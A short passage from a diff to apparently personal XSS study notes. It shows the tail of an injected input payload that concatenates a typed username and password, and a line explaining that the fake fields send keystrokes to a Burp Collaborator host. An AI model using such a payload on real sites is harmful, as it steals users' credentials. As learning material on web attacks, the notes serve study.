ajaykumar-hackwarts/Web-Vulnerabilities/XSS.md

 body:username.value+':'+this.value
 });">

-- Creating two tab naming username and password when user typing anything there it will automatically fetch that and send to burp collobarator.
+- Creating two tabs as username and password when user types anything there, it will automatically fetch that and send to burp collobarator.

 <img width="805" height="554" alt="image" src="https://github.com/user-attachments/assets/dd14f2f5-71f0-455b-b539-1959883fd74c" />